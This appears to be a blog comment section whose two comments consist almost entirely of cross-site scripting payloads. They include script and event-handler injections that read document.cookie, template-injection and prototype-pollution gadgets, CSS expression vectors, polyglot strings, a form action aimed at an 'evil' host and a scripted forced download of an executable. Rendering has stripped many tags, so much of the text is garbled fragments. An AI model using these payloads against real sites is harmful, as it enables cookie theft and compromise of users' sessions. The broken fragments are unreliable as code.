Join the Conversation

3 Comments

  1. “>
    “>123@sdf.com
    “>
    {{$on.constructor(‘alert(1)’)()}}
    {{constructor.constructor(‘alert(1)’)()}}
    ><?Title/</Style/</Textarea/<Body/OnPageShow=(confirm)(1)

    */ alert(1)//
    ” onclick=alert(1)// */ alert(1)//
    Link

    1′”>
    <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f

    html += “”;
    <img src=x onerror="alert(document.cookie);"
    .jpg’ />
    click
    “>”@x.y

    #’>


    “/ondblclick=`z
    <svg ( =prompt, (1)) “”> pear
    <–° –!> ‘
    “/onload=confirm()// ¢ .. §
    click
    er aan
    z on .
    “‘..lpe/Title/</Style/</Script/</Textarea/</Noscript/</Pre/#
    : ee

    <img/src=`%00` onerror=this.onerror=confirm(1)
    ">%00
    <iframe/src="data:text/html,”>
    &#00;
    <img/&#0
    XYZ

    <p title="”>
    <img src="”/>
    “>
    “>
    “>

    ">{-o-link-source&colon;”
    OnMouseOver {Firefox & Opera
    /*iframe/src*/<iframe/src="
    <plaintext/onmouseover=prompt(1)
    DIV

    <iframe/src \/\/onload = prompt(1)
    <iframe/onreadystatechange=alert(1)
    <input type="text" value=“ X

    style=”x:”>
    <–` –!>
    x

    ">{-o-link-source&colon;”

    <!–
    <img src="
    LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}

    <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
    “)
    alert(String.fromCharCode(88, 115, 115, 32, 66, 121, 32, 79, 108, 100, 77, 111, 104, 97, 109, 109))
    “>
    javascript:prompt(document.domain)&return_to=https%3A%2F%2Fapp.shopify.com%2Fservices%2Flogin%2Fidentity_callback%3Fshop_name%3D123ashketchum%26state%3D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%253D&ui_locales=en&upgradeable=true&ux=shop

    Test

    XSS
    XSS via target in a tag

    Object.prototype.tagName = ‘img’Object.prototype.src = [‘x:x’]Object.prototype.onerror = [‘alert(1)’](function() {var View = Mn.View.extend({template: ‘#template-layout’});var App = Mn.Application.extend({region: ‘#app’, onStart: function() {this.showView(new View());}});var app = new App();app.start();})();xxx
    XSS
    <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
    <p title=" *{/*all*/color/*all*/:/*/#e84393/*all*/;}
    ”@x.y

    #’>
    templates.input = _.template(‘<input class="” type=”” name=”” />’);
    ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
    ABCalert(1)

    /**/
    “>
    “>
    jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/\x3csVg/\x3e
    Click Here

    aaa
    aaa

    ba1man”>alert(document.cookie)
    onmouseover=alert(1)
    t00t
    “;!—“”alert(document.cookie);=&{(alert(document.cokie))}
    *””*
    “>(1)alert(1)
    Example Attack
    poc
    alert(“XSS”)”>
    <!–
    STORED XSSt(“OpenRemoteReport”)>
    *”>alert(document.cookie)*
    “>alert(document.cookie)

    alert(“3: “+document.domain)
    var link = document.createElement(‘a’);link.href = ‘http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe’; link.download = ”; document.body.appendChild(link); link.click();

    13″–>”>’` — `<!–
    “accesskey%3d”x”onclick%3d”alert`XSS`”
    ‘);
    “ab”

    “>123”
    “‘> or “/>
    “>alert(‘XSS’)

    m0ze1″–>
    m0ze1”–>
    <!–m0ze
    <!–m0ze

    <!–
    %3cscript%3ealert(1)%3c%2fscript%3e
    “AAAAAAA”
    “>
    <–` –!>
    {“type”:”general”,”name”:”alert(0)”,”mail”:”mail@example.com”,”subject”:”alert(1)”,”message”:”alert(2)”}
    alert(“XSS&quot
    bKtx(9366)
    e”>zi2u(9111)
    “>#”>
    >”>alert(“XXS POC”)
    ss”>
    “>alert(“Ismail Tasdelen”)
    from]alert(‘XSS-1’)&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])alert(‘XSS-2’)
    [video=PAYLOAD]http://victim.com[/video]
    getpage=html%2Findex.html&errorpage=alert(‘r3m0t3nu11’)&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
    teertertalert(‘1’)
    “”>alert(‘1’)<a
    "onmouseover=" alert(document.cookie)
    list"

    alert(“XSS”)”>

    “>
    “>
    “>
    “>Clickme
    “>Clickme
    “>Clickme
    “>click
    “>
    “>clickme
    “>
    “>
    “>
    “>Clickme
    “>Clickme
    “>Clickme
    “>
    “>clickmeonchrome
    “>hoveme
    “>
    “>
    “>DragMe
    –>hello.
    XSS


    <alert("test");//

    <svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/\x3csVg/\x3e’; “>
    //’/–>12′)//”“>test
    ‘;”>’>alert(String.fromCharCode(88,83,83))
    <scriPt>alert(document.cookie)</sCript>

    <img src=/ onerror=confir\u006d(document.cookie) /><script>
    Y000
    </script>alert(document.cookie)</script>
    aaaaaaaaaaaaaaa”>alert(document.cookie)
    “>: “> –!> “> “> “> “> “> >”script>alert(document.cookie)/script> break Content-Security-Policy with ‘–>”> “/>
    Tocuch me!
    “>>

  2. X
    // window.opener still works


    X

    X

    CLICK // window.opener will be null
    CLICK // window.opener will be null
    CLICK // window.opener still works
    CLICKME// window.opener still works
    CLICKME// window.opener still works
    <iframe srcdoc="
    <a href="javascript:&apos;CLICK

    @keyframes x{}

    <!–
    <img src="

    <img src="

    XXX
    alert(1)

    // Firefox only
    <b alert(1)//0
    document.getElementById(“div2”).innerHTML = document.getElementById(“div1″).innerHTML;

    // O10.10↓, OM10.0↓, GC6↓, FF
    // IE6, O11.01↓, OM10.1↓
    // IE6, O10.10↓, OM10.0↓
    x
    alert(1)”>
    alert(1)”>

    <img src="x` `alert(1)”` `>
    XXX


    <!–[if –>

    <!– `

    X
    p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};
    <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
    @import “data:,*%7bx:expression(write(1))%7D”;
    XXXXXX
    *[{}@import’test.css?]{color: green;}X
    * {-o-link:’javascript:alert(1)’;-o-link-source: current;}
    XXX
    XXX
    XXX

    *{x:expression(write(1))}
    PRESS ENTER
    X
    X
    X
    with(document.getElementById(“d”))innerHTML=innerHTML
    ({set/**/$($){_/**/setter=$,_=1}}).$=alert
    ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x
    Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()
    history.pushState(0,0,’/i/am/somewhere_else’);
    {alert(1)};1
    +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
    0?Worker(“#”).onmessage=function(_)eval(_.data) :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
    crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)
    [{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]

    &x;

    1
    1
    1
    1
    XXX


    Drop me

Leave a comment